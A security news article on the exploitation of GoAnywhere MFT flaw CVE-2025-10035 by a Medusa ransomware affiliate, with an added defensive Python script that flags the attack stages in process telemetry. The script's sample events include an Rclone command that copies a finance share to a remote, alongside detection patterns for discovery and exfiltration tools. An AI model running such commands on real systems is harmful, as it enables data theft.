Microsoft Links GoAnywhere MFT Exploitation to Medusa Ransomware Group
Overview of the Situation
Microsoft has tied the active exploitation of a critical vulnerability in Fortra's GoAnywhere MFT file transfer platform to a ransomware affiliate. Tracked as CVE-2025-10035, the flaw has been under attack since at least September 11, 2025, a week before Fortra published its advisory. Microsoft attributes the campaign to Storm-1175, a threat actor known for deploying Medusa ransomware.
Exploit Dynamics Unveiled
Microsoft's findings, published in a blog post on October 6, lay out the tactics Storm-1175 used. The intrusions began with the deserialization vulnerability in GoAnywhere MFT, which was a zero-day at the time: Fortra's advisory describes it as a flaw in the product's License Servlet that lets an attacker holding a validly forged license response signature deserialize an arbitrary attacker-controlled object, leading to command execution. After the initial compromise, the attackers installed the remote monitoring and management (RMM) tools SimpleHelp and MeshAgent to keep a foothold on the compromised systems.
The attackers then ran user and system discovery commands and network scanning tools such as netscan to map the environment ahead of lateral movement. According to Microsoft, the RMM tools also served as the command-and-control channel, which gave the attackers interactive access without custom malware.
The Exfiltration Phase
For exfiltration, Microsoft observed the deployment of Rclone, a popular command-line tool for syncing files to cloud storage, in at least one compromised environment. The intrusion ended with Medusa ransomware being deployed in one of the affected environments.
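The chain Microsoft describes (a shell spawned from the GoAnywhere Java process, RMM installs, discovery tooling, Rclone) is what a defender would want to correlate in process-creation telemetry. The script below is an added example, not Microsoft's, Fortra's or watchTowr's code: it runs simple per-stage rules over constructed Sysmon-style process-creation events and only alerts on a host where the initial-access signal is followed by at least two later stages, so a lone `whoami` on an unrelated server does not fire. The indicator strings, file paths, hostnames and event fields are assumptions for illustration, not published indicators of compromise.

```python
"""Correlate GoAnywhere MFT post-exploitation stages in process-creation events.

Added example, not vendor code. Event shape follows Sysmon Event ID 1 /
Windows 4688 fields; sample events, paths and hostnames are constructed.
"""
import re
from collections import defaultdict

# Indicator patterns are assumptions for this example, not published IOCs.
SHELL = re.compile(r"\\(cmd|powershell|pwsh)\.exe$", re.I)
GOANYWHERE_JAVA = re.compile(r"goanywhere.*\\java(w)?\.exe$", re.I)
RMM = re.compile(r"simplehelp|meshagent|remote access\.exe", re.I)
DISCOVERY = re.compile(r"\\(whoami|net1?|nltest|systeminfo|ipconfig|netscan)\.exe$", re.I)
RCLONE_IMAGE = re.compile(r"\\rclone\.exe$", re.I)
RCLONE_CMD = re.compile(r"(^|\\)rclone(\.exe)?\b.*\b(copy|sync|move)\b", re.I)

# Constructed sample events: MFT01 shows the full chain, FS01 is benign noise.
SAMPLE_EVENTS = [
    {"ts": "2025-09-11T02:14:03Z", "host": "MFT01",
     "parent_image": r"C:\Program Files\GoAnywhere\jre\bin\java.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c whoami"},
    {"ts": "2025-09-11T02:14:09Z", "host": "MFT01",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\whoami.exe",
     "command_line": "whoami"},
    {"ts": "2025-09-11T02:21:40Z", "host": "MFT01",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Users\Public\SimpleHelp\Remote Access.exe",
     "command_line": r'"C:\Users\Public\SimpleHelp\Remote Access.exe" /S'},
    {"ts": "2025-09-11T02:30:12Z", "host": "MFT01",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Users\Public\netscan.exe",
     "command_line": "netscan.exe /range:10.0.0.0/24"},
    {"ts": "2025-09-12T01:05:55Z", "host": "MFT01",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Users\Public\rclone.exe",
     "command_line": r"rclone.exe copy D:\Shares\Finance remote:staging --transfers 8"},
    {"ts": "2025-09-11T09:00:00Z", "host": "FS01",
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\whoami.exe",
     "command_line": "whoami /groups"},
]


def classify(event):
    """Return the set of attack stages a single event matches (may be empty)."""
    stages = set()
    # A shell whose parent is the GoAnywhere Java process is the
    # deserialization-to-command-execution signal on the MFT host itself.
    if GOANYWHERE_JAVA.search(event["parent_image"]) and SHELL.search(event["image"]):
        stages.add("initial_access")
    if RMM.search(event["image"]) or RMM.search(event["command_line"]):
        stages.add("rmm_persistence")
    if DISCOVERY.search(event["image"]):
        stages.add("discovery")
    if RCLONE_IMAGE.search(event["image"]) or RCLONE_CMD.search(event["command_line"]):
        stages.add("exfiltration")
    return stages


def triage(events, min_later_stages=2):
    """Group matched stages per host with first-seen timestamps.

    A host is alerted only when initial access on the MFT process is followed
    by at least `min_later_stages` of the later stages, which keeps a single
    noisy indicator (an admin running whoami) from paging anyone.
    """
    by_host = defaultdict(dict)  # host -> stage -> first timestamp seen
    for e in sorted(events, key=lambda e: e["ts"]):
        for stage in classify(e):
            by_host[e["host"]].setdefault(stage, e["ts"])
    result = {}
    for host, stages in by_host.items():
        later = [s for s in stages if s != "initial_access"]
        result[host] = {
            "stages": stages,
            "alert": "initial_access" in stages and len(later) >= min_later_stages,
        }
    return result


if __name__ == "__main__":
    for host, verdict in triage(SAMPLE_EVENTS).items():
        flag = "ALERT" if verdict["alert"] else "ok"
        print(f"{host}: {flag} stages={sorted(verdict['stages'])}")
```

On the constructed input MFT01 is alerted with all four stages and FS01 is not, even though its `whoami` matched the discovery rule. In a real deployment the parent-process rule is the high-confidence piece: the GoAnywhere service has no business spawning `cmd.exe` or `powershell.exe`, so that single event is worth an alert on its own once the path pattern is adjusted to the local install directory.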
Expert Insights
Benjamin Harris, the CEO and founder of watchTowr, expressed deep concern about this situation, emphasizing the potential impact on organizations using GoAnywhere MFT. Harris highlighted how the confirmed exploitation of CVE-2025-10035 weeks prior has now been tied to a known Medusa affiliate.
He stated that organizations running this particular file transfer system have effectively been under silent attack for a month, with minimal communication from Fortra regarding the incident. Harris emphasized the growing need for transparency, urging Fortra to provide answers regarding how the attackers gained access to the sensitive keys necessary for exploiting the vulnerability.
Call for Transparency
With the spotlight on Fortra, many stakeholders are asking why so little information has been shared. The company has not updated its advisory since its initial publication on September 18, and the prolonged silence adds to the uncertainty for affected organizations as their security teams try to work out the full scope of their exposure.
Harris's call for clearer communication reflects a broader sentiment in the security community: customers need timely, transparent updates, especially while exploitation is ongoing. Without them, organizations cannot judge whether they were hit during the month before the advisory or decide which hosts to treat as compromised.
Continual Monitoring and Assessments
As the situation evolves, security firms and practitioners are keeping a close watch on the GoAnywhere MFT vulnerability. Fortra's advisory directs customers to upgrade to release 7.8.4 or Sustain Release 7.6.3, to keep the admin console off the public internet, and to review the Admin Audit logs for errors containing the string SignedObject.getObject, which the vendor lists as an indicator of attempted exploitation. Because exploitation predates the advisory by about a week, organizations should treat a clean patch as necessary but not sufficient and hunt for the post-exploitation activity Microsoft describes.
With the Medusa affiliate's tradecraft now documented, organizations running GoAnywhere MFT must remain proactive: patch, verify exposure, and check for RMM tools, scanning utilities and Rclone that nobody in the organization installed.
In summary, the case illustrates how much exposure rides on internet-facing file transfer systems across many industries. A single deserialization flaw took Storm-1175 from a perimeter server to data theft and Medusa ransomware, which underscores the need for prompt patching, monitoring of edge appliances and timely disclosure from software vendors, since customers cannot defend against a threat whose scope they have not been told.